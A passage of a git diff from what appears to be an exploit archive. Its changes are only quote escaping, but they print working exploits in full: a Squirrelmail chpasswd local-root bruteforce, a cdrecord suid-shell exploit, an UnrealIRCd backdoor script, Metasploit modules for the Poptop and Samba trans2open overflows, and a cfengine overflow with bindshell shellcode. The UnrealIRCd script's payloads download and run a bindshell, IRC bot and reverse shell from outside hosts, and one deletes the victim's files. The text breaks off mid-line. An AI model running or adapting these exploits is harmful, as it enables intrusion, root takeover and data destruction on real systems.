chpasswd local root bruteforce exploit n\"); -printf(\"t code By Bytes 2004 n\"); -printf(\"t http://www.ph4nt0m.net n\"); -printf(\"t#######################################################n\"); +printf("t-------------------------------------------------------n"); +printf("t Squirrelmail chpasswd local root bruteforce exploit n"); +printf("t code By Bytes 2004 n"); +printf("t http://www.ph4nt0m.net n"); +printf("t#######################################################n"); sleep(1); -printf(\"[+] Bruteforce......nn\"); +printf("[+] Bruteforce......nn"); sleep(2); @@ -105,19 +105,19 @@ for(i=0; i < 150; i+=4){ } -printf(\"buf1 = %sn\",buf1); +printf("buf1 = %sn",buf1); -execl(Fuckpr0,\"chpasswd\",buf1,buf2,0); +execl(Fuckpr0,"chpasswd",buf1,buf2,0); } wait(&status); -printf(\"[-] Signal: #%in\", status); +printf("[-] Signal: #%in", status); if(WIFEXITED(status) != 0 ) { -printf(\"[=] Step.%i: 0x%xn[~] Exiting...n\",(j/2),ret_addr); +printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr); exit(1); @@ -127,7 +127,7 @@ ret_addr += offset; j += offset; -printf(\"[=] Offset:%d Use ret:0x%xn\",j, ret_addr); +printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr); } diff --git a/platforms/linux/local/438.c b/platforms/linux/local/438.c index 5ecb083f6..448a18158 100755 --- a/platforms/linux/local/438.c +++ b/platforms/linux/local/438.c @@ -3,7 +3,7 @@ # # cdrecord-suidshell.sh - I)ruid [CAU] (09.2004) # -# Exploits cdrecord\'s exec() of $RSH before dropping privs +# Exploits cdrecord's exec() of $RSH before dropping privs # cat > ./cpbinbash.c << __EOF__ @@ -17,14 +17,14 @@ int fd1, fd2; int count; char buffer[1]; -/* Set ID\'s */ +/* Set ID's */ setuid( geteuid() ); setgid( geteuid() ); /* Copy the shell */ -if ((fd1=open( \"/bin/bash\", O_RDONLY))<0) +if ((fd1=open( "/bin/bash", O_RDONLY))<0) return -1; -if ((fd2=open( \"./bash\", O_WRONLY|O_CREAT))<0) +if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0) return -1; while((count=read(fd1, buffer, 1))) write(fd2, buffer, count); @@ -33,8 +33,8 @@ close( fd1 ); close( fd2 ); /* Priv the shell */ -chown( \"./bash\", geteuid(), geteuid() ); -chmod( \"./bash\", 3565 ); +chown( "./bash", geteuid(), geteuid() ); +chmod( "./bash", 3565 ); } __EOF__ diff --git a/platforms/linux/remote/13853.pl b/platforms/linux/remote/13853.pl index 7a67406b4..b3ff45b16 100755 --- a/platforms/linux/remote/13853.pl +++ b/platforms/linux/remote/13853.pl @@ -7,53 +7,53 @@ use Socket; use IO::Socket; ## Payload options -my $payload1 = \'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &\'; -my $payload2 = \'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &\'; -my $payload3 = \'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &\'; -my $payload4 = \'AB; killall ircd\'; -my $payload5 = \'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *\'; +my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &'; +my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &'; +my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &'; +my $payload4 = 'AB; killall ircd'; +my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *'; -$host = \"\"; -$port = \"\"; -$type = \"\"; +$host = ""; +$port = ""; +$type = ""; $host = @ARGV[0]; $port = @ARGV[1]; $type = @ARGV[2]; -if ($host eq \"\") { usage(); } -if ($port eq \"\") { usage(); } -if ($type eq \"\") { usage(); } +if ($host eq "") { usage(); } +if ($port eq "") { usage(); } +if ($type eq "") { usage(); } sub usage { - printf \"\\nUsage :\\n\"; - printf \"perl unrealpwn.pl \\n\\n\"; - printf \"Command list :\\n\"; - printf \"[1] - Perl Bindshell\\n\"; - printf \"[2] - Perl Reverse Shell\\n\"; - printf \"[3] - Perl Bot\\n\"; - printf \"-----------------------------\\n\"; - printf \"[4] - shutdown ircserver\\n\"; - printf \"[5] - delete ircserver\\n\"; + printf "\nUsage :\n"; + printf "perl unrealpwn.pl \n\n"; + printf "Command list :\n"; + printf "[1] - Perl Bindshell\n"; + printf "[2] - Perl Reverse Shell\n"; + printf "[3] - Perl Bot\n"; + printf "-----------------------------\n"; + printf "[4] - shutdown ircserver\n"; + printf "[5] - delete ircserver\n"; exit(1); } sub unreal_trojan { my $ircserv = $host; my $ircport = $port; - my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => \"tcp\") || die \"Failed to connect to $ircserv on $ircport ...\\n\\n\"; - print \"[+] Payload sent ...\\n\"; - if ($type eq \"1\") { - print $sockd \"$payload1\"; - } elsif ($type eq \"2\") { - print $sockd \"$payload2\"; - } elsif ($type eq \"3\") { - print $sockd \"$payload3\"; - } elsif ($type eq \"4\") { - print $sockd \"$payload4\"; - } elsif ($type eq \"5\") { - print $sockd \"$payload5\"; + my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...\n\n"; + print "[+] Payload sent ...\n"; + if ($type eq "1") { + print $sockd "$payload1"; + } elsif ($type eq "2") { + print $sockd "$payload2"; + } elsif ($type eq "3") { + print $sockd "$payload3"; + } elsif ($type eq "4") { + print $sockd "$payload4"; + } elsif ($type eq "5") { + print $sockd "$payload5"; } else { - printf \"\\nInvalid Option ...\\n\\n\"; + printf "\nInvalid Option ...\n\n"; usage(); } close($sockd); diff --git a/platforms/linux/remote/16845.rb b/platforms/linux/remote/16845.rb index f054fbe93..56b8e28f0 100755 --- a/platforms/linux/remote/16845.rb +++ b/platforms/linux/remote/16845.rb @@ -9,7 +9,7 @@ # http://metasploit.com/framework/ ## -require \'msf/core\' +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - \'Name\' => \'Poptop Negative Read Overflow\', - \'Description\' => %q{ + 'Name' => 'Poptop Negative Read Overflow', + 'Description' => %q{ This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. @@ -31,44 +31,44 @@ class Metasploit3 < Msf::Exploit::Remote Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock. }, - \'Author\' => \'spoonm\', - \'License\' => MSF_LICENSE, - \'Version\' => \'$Revision: 11114 $\', - \'References\' => + 'Author' => 'spoonm', + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 11114 $', + 'References' => [ - [\'CVE\', \'2003-0213\'], - [\'OSVDB\', \'3293\'], - [\'URL\', \'http://securityfocus.com/archive/1/317995\'], - [\'URL\', \'http://www.freewebs.com/blightninjas/\'], + ['CVE', '2003-0213'], + ['OSVDB', '3293'], + ['URL', 'http://securityfocus.com/archive/1/317995'], + ['URL', 'http://www.freewebs.com/blightninjas/'], ], - \'Privileged\' => true, - \'Payload\' => + 'Privileged' => true, + 'Payload' => { # Payload space is dynamically determined - \'MinNops\' => 16, - \'StackAdjustment\' => -1088, - \'Compat\' => + 'MinNops' => 16, + 'StackAdjustment' => -1088, + 'Compat' => { - \'ConnectionType\' => \'-find\', + 'ConnectionType' => '-find', } }, - \'SaveRegisters\' => [ \'esp\' ], - \'Platform\' => \'linux\', - \'Arch\' => ARCH_X86, - \'Targets\' => + 'SaveRegisters' => [ 'esp' ], + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Targets' => [ - [\'Linux Bruteforce\', - { \'Bruteforce\' => + ['Linux Bruteforce', + { 'Bruteforce' => { - \'Start\' => { \'Ret\' => 0xbffffa00 }, - \'Stop\' => { \'Ret\' => 0xbffff000 }, - \'Step\' => 0 + 'Start' => { 'Ret' => 0xbffffa00 }, + 'Stop' => { 'Ret' => 0xbffff000 }, + 'Step' => 0 } } ], ], - \'DefaultTarget\' => 0, - \'DisclosureDate\' => \'Apr 9 2003\')) + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 9 2003')) register_options( [ @@ -77,26 +77,26 @@ class Metasploit3 < Msf::Exploit::Remote register_advanced_options( [ - OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]), - OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]), - OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]), - OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]), - OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]), + OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]), + OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]), + OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), + OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]), + OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]), ], self.class) end # Dynamic payload space calculation def payload_space(explicit_target = nil) - datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i + datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i end def build_packet(length) - [length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') + - [1,0].pack(\'cc\') + - [0].pack(\'n\') + - [1,1,0,2600].pack(\'NNnn\') + - datastore[\'Hostname\'].ljust(64, \"\\x00\") + - datastore[\'Vendor\'].ljust(64, \"\\x00\") + [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') + + [1,0].pack('cc') + + [0].pack('n') + + [1,1,0,2600].pack('NNnn') + + datastore['Hostname'].ljust(64, "\x00") + + datastore['Vendor'].ljust(64, "\x00") end def check @@ -114,13 +114,13 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) connect - print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\") + print_status("Trying #{"%.8x" % addrs['Ret']}...") # Construct the evil length packet packet = build_packet(1) + payload.encoded + - ([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4)) + ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4)) sock.put(packet) diff --git a/platforms/linux/remote/16861.rb b/platforms/linux/remote/16861.rb index 627c2d9f7..75aaace2a 100755 --- a/platforms/linux/remote/16861.rb +++ b/platforms/linux/remote/16861.rb @@ -9,7 +9,7 @@ # http://metasploit.com/framework/ ## -require \'msf/core\' +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - \'Name\' => \'Samba trans2open Overflow (Linux x86)\', - \'Description\' => %q{ + 'Name' => 'Samba trans2open Overflow (Linux x86)', + 'Description' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not @@ -29,45 +29,45 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. }, - \'Author\' => [ \'hdm\', \'jduck\' ], - \'License\' => MSF_LICENSE, - \'Version\' => \'$Revision: 9828 $\', - \'References\' => + 'Author' => [ 'hdm', 'jduck' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 9828 $', + 'References' => [ - [ \'CVE\', \'2003-0201\' ], - [ \'OSVDB\', \'4469\' ], - [ \'BID\', \'7294\' ], - [ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ] + [ 'CVE', '2003-0201' ], + [ 'OSVDB', '4469' ], + [ 'BID', '7294' ], + [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] ], - \'Privileged\' => true, - \'Payload\' => + 'Privileged' => true, + 'Payload' => { - \'Space\' => 1024, - \'BadChars\' => \"\\x00\", - \'MinNops\' => 512, - \'StackAdjustment\' => -3500 + 'Space' => 1024, + 'BadChars' => "\x00", + 'MinNops' => 512, + 'StackAdjustment' => -3500 }, - \'Platform\' => \'linux\', - \'Targets\' => + 'Platform' => 'linux', + 'Targets' => [ # tested OK - jjd: # RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc # RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc - [ \'Samba 2.2.x - Bruteforce\', + [ 'Samba 2.2.x - Bruteforce', { - \'PtrToNonZero\' => 0xbffffff4, # near the bottom of the stack - \'Offset\' => 1055, - \'Bruteforce\' => + 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack + 'Offset' => 1055, + 'Bruteforce' => { - \'Start\' => { \'Ret\' => 0xbffffdfc }, - \'Stop\' => { \'Ret\' => 0xbfa00000 }, - \'Step\' => 256 + 'Start' => { 'Ret' => 0xbffffdfc }, + 'Stop' => { 'Ret' => 0xbfa00000 }, + 'Step' => 256 } } ], ], - \'DefaultTarget\' => 0, - \'DisclosureDate\' => \'Apr 7 2003\' + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 7 2003' )) register_options( @@ -78,20 +78,20 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) - curr_ret = addrs[\'Ret\'] + curr_ret = addrs['Ret'] begin - print_status(\"Trying return address 0x%.8x...\" % curr_ret) + print_status("Trying return address 0x%.8x..." % curr_ret) connect smb_login if ! @checked_peerlm if smb_peer_lm !~ /samba/i - raise RuntimeError, \"This target is not a Samba server (#{smb_peer_lm}\" + raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}" end - if smb_peer_lm =~ /Samba [34]\\./i - raise RuntimeError, \"This target is not a vulnerable Samba server (#{smb_peer_lm})\" + if smb_peer_lm =~ /Samba [34]\./i + raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})" end end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote # This value *must* be 1988 to allow findrecv shellcode to work - # XXX: I\'m not sure the above comment is true... + # XXX: I'm not sure the above comment is true... pattern = rand_text_english(1988) # See the OSX and Solaris versions of this module for additional @@ -107,8 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2 # (rpmbuild -bp ; edited/reran config.status ; make) - eip_off = target[\'Offset\'] - ptr_to_non_zero = target[\'PtrToNonZero\'] + eip_off = target['Offset'] + ptr_to_non_zero = target['PtrToNonZero'] # Stuff the shellcode into the request pattern[0, payload.encoded.length] = payload.encoded @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote # 222 if (IS_IPC(conn)) { # 223 return(ERROR(ERRSRV,ERRaccess)); # 224 } - pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\') + pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V') # We want to avoid crashing on the following two derefences. # @@ -127,23 +127,23 @@ class Metasploit3 < Msf::Exploit::Remote # 117 { # 118 int outsize = set_message(outbuf,0,0,True); # 119 int cmd = CVAL(inbuf,smb_com); - pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\') - pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\') + pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V') + pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V') # This stream covers the framepointer and the return address - #pattern[1199, 400] = [curr_ret].pack(\'N\') * 100 - pattern[eip_off, 4] = [curr_ret].pack(\'V\') + #pattern[1199, 400] = [curr_ret].pack('N') * 100 + pattern[eip_off, 4] = [curr_ret].pack('V') trans = - \"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+ - \"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+ + "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ + "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ pattern - # puts \"press any key\"; $stdin.gets + # puts "press any key"; $stdin.gets sock.put(trans) handler @@ -152,7 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError raise $! rescue ::Exception => e - print_error(\"#{rhost} #{e}\") + print_error("#{rhost} #{e}") end handler diff --git a/platforms/linux/remote/16880.rb b/platforms/linux/remote/16880.rb index abdceebd4..bef8eb71a 100755 --- a/platforms/linux/remote/16880.rb +++ b/platforms/linux/remote/16880.rb @@ -9,7 +9,7 @@ # http://metasploit.com/framework/ ## -require \'msf/core\' +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - \'Name\' => \'Samba trans2open Overflow (*BSD x86)\', - \'Description\' => %q{ + 'Name' => 'Samba trans2open Overflow (*BSD x86)', + 'Description' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. }, - \'Author\' => [ \'hdm\', \'jduck\' ], - \'License\' => MSF_LICENSE, - \'Version\' => \'$Revision: 9552 $\', - \'References\' => + 'Author' => [ 'hdm', 'jduck' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 9552 $', + 'References' => [ - [ \'CVE\', \'2003-0201\' ], - [ \'OSVDB\', \'4469\' ], - [ \'BID\', \'7294\' ], - [ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ] + [ 'CVE', '2003-0201' ], + [ 'OSVDB', '4469' ], + [ 'BID', '7294' ], + [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] ], - \'Privileged\' => true, - \'Payload\' => + 'Privileged' => true, + 'Payload' => { - \'Space\' => 1024, - \'BadChars\' => \"\\x00\", - \'MinNops\' => 512, - \'StackAdjustment\' => -3500 + 'Space' => 1024, + 'BadChars' => "\x00", + 'MinNops' => 512, + 'StackAdjustment' => -3500 }, - \'Platform\' => \'bsd\', - \'Targets\' => + 'Platform' => 'bsd', + 'Targets' => [ # tested OK - jjd: # FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8 - [ \'Samba 2.2.x - Bruteforce\', + [ 'Samba 2.2.x - Bruteforce', { - \'PtrToNonZero\' => 0xbfbffff4, # near the bottom of the stack - \'Offset\' => 1055, - \'Bruteforce\' => + 'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack + 'Offset' => 1055, + 'Bruteforce' => { - \'Start\' => { \'Ret\' => 0xbfbffdfc }, - \'Stop\' => { \'Ret\' => 0xbfa00000 }, - \'Step\' => 256 + 'Start' => { 'Ret' => 0xbfbffdfc }, + 'Stop' => { 'Ret' => 0xbfa00000 }, + 'Step' => 256 } } ], ], - \'DefaultTarget\' => 0, - \'DisclosureDate\' => \'Apr 7 2003\' + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 7 2003' )) register_options( @@ -74,15 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) - curr_ret = addrs[\'Ret\'] + curr_ret = addrs['Ret'] begin - print_status(\"Trying return address 0x%.8x...\" % curr_ret) + print_status("Trying return address 0x%.8x..." % curr_ret) connect smb_login # This value *must* be 1988 to allow findrecv shellcode to work - # XXX: I\'m not sure the above comment is true... + # XXX: I'm not sure the above comment is true... pattern = rand_text_english(1988) # See the OSX and Solaris versions of this module for additional @@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2 # (rpmbuild -bp ; edited/reran config.status ; make) - eip_off = target[\'Offset\'] - ptr_to_non_zero = target[\'PtrToNonZero\'] + eip_off = target['Offset'] + ptr_to_non_zero = target['PtrToNonZero'] # Stuff the shellcode into the request pattern[0, payload.encoded.length] = payload.encoded @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # 222 if (IS_IPC(conn)) { # 223 return(ERROR(ERRSRV,ERRaccess)); # 224 } - pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\') + pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V') # We want to avoid crashing on the following two derefences. # @@ -110,23 +110,23 @@ class Metasploit3 < Msf::Exploit::Remote # 117 { # 118 int outsize = set_message(outbuf,0,0,True); # 119 int cmd = CVAL(inbuf,smb_com); - pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\') - pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\') + pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V') + pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V') # This stream covers the framepointer and the return address - #pattern[1199, 400] = [curr_ret].pack(\'N\') * 100 - pattern[eip_off, 4] = [curr_ret].pack(\'V\') + #pattern[1199, 400] = [curr_ret].pack('N') * 100 + pattern[eip_off, 4] = [curr_ret].pack('V') trans = - \"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+ - \"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+ - \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+ + "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ + "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ pattern - # puts \"press any key\"; $stdin.gets + # puts "press any key"; $stdin.gets sock.put(trans) handler @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue EOFError rescue => e - print_error(\"#{e}\") + print_error("#{e}") end end diff --git a/platforms/linux/remote/23182.c b/platforms/linux/remote/23182.c index 60e4e70fb..3bdd18bee 100755 --- a/platforms/linux/remote/23182.c +++ b/platforms/linux/remote/23182.c @@ -4,7 +4,7 @@ cfengine is prone to a stack-based buffer overrun vulnerability. This issue may The vulnerability may be exploited to execute arbitrary code with the privileges of cfservd. A denial of service may also be the result of exploitation attempts as cfservd is multi-threaded and may not be configured to restart itself via a super-server such as inetd. -/*********************************************************************************\\ +/*********************************************************************************\ * jsk / cfengine2-2.0.3 from redhat @@ -16,7 +16,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges * DSR-cfengine.pl :) i think it has some bugs.maybe it is only public * version...... possbile another reasns..... -* the begin buf of exploit could be like \"111111\". so....DSR... +* the begin buf of exploit could be like "111111". so....DSR... * by jsk from Ph4nt0m Security Team * jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m) @@ -50,7 +50,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges -\\*********************************************************************************/ +\*********************************************************************************/ @@ -72,7 +72,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges #define D_PORT 5803 -#define D_HOST \"www.ph4nt0m.net\" +#define D_HOST "www.ph4nt0m.net" #define TIMEOUT 10 @@ -80,18 +80,18 @@ The vulnerability may be exploited to execute arbitrary code with the privileges char shell[]= /* bindshell(26112)&, netric. */ - \"\\x90\\x90\\x90\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\" - \"\\x6a\\x02\\x89\\xe1\\xb0\\x66\\x52\" - \"\\x50\\xcd\\x80\\x43\\x66\\x53\\x89\" - \"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\" - \"\\x52\\x50\\xb0\\x66\\xcd\\x80\\x89\" - \"\\xe1\\xb3\\x04\\xb0\\x66\\xcd\\x80\" - \"\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\" - \"\\x93\\xb0\\x3f\\xcd\\x80\\x49\\x79\" - \"\\xf9\\x52\\x68\\x6e\\x2f\\x73\\x68\" - \"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\" - \"\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\" - \"\\x80\"; + "\x90\x90\x90\x31\xdb\xf7\xe3\x53\x43\x53" + "\x6a\x02\x89\xe1\xb0\x66\x52" + "\x50\xcd\x80\x43\x66\x53\x89" + "\xe1\x6a\x10\x51\x50\x89\xe1" + "\x52\x50\xb0\x66\xcd\x80\x89" + "\xe1\xb3\x04\xb0\x66\xcd\x80" + "\x43\xb0\x66\xcd\x80\x89\xd9" + "\x93\xb0\x3f\xcd\x80\x49\x79" + "\xf9\x52\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69\x89\xe3" + "\x52\x53\x89\xe1\xb0\x0b\xcd" + "\x80"; struct op_plat_st { @@ -112,15 +112,15 @@ struct op_plat_st __pl_form[]= -{0,\"red 8.0\",0x4029cc2c,0}, +{0,"red 8.0",0x4029cc2c,0}, -{1,\"red 9.0(cmp)\",0x4029cda0,0}, +{1,"red 9.0(cmp)",0x4029cda0,0}, -{2,\"red 7.2 (Compile)\",0x44444444,0}, +{2,"red 7.2 (Compile)",0x44444444,0}, -{3,\"red 7.3 (Compile)\",0x44444444,0}, +{3,"red 7.3 (Compile)",0x44444444,0}, NULL @@ -136,17 +136,17 @@ void getshell(char *,unsigned short); void printe(char *,short); -void sig_alarm(){printe(\"alarm/timeout hit.\",1);} +void sig_alarm(){printe("alarm/timeout hit.",1);} void banrl() { -fprintf(stdout,\"\\n cfengine2-2.0.3:server remote buffer overflow exploit)\\n\"); +fprintf(stdout,"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n"); -fprintf(stdout,\" by jsk.\\n\"); +fprintf(stdout," by jsk.\n"); -fprintf(stdout,\" Greets Br-00t and all #ph4nt0m .\\n\"); +fprintf(stdout," Greets Br-00t and all #ph4nt0m .\n"); } @@ -158,17 +158,17 @@ void x_fp_rm_usage(char *x_fp_rm) int __t_xmp=0; -fprintf(stdout,\"\\n Usage: %s -[option] [arguments]\\n\\n\",x_fp_rm); +fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm); -fprintf(stdout,\"\\t -h [hostname] - target host.\\n\"); +fprintf(stdout,"\t -h [hostname] - target host.\n"); -fprintf(stdout,\"\\t -p [port] - port number.\\n\"); +fprintf(stdout,"\t -p [port] - port number.\n"); -fprintf(stdout,\"\\t -s [addr] - &shellcode address.\\n\\n\"); +fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n"); -fprintf(stdout,\" Example> %s -h target_hostname -p 8000 -t num\\n\",x_fp_rm); +fprintf(stdout," Example> %s -h 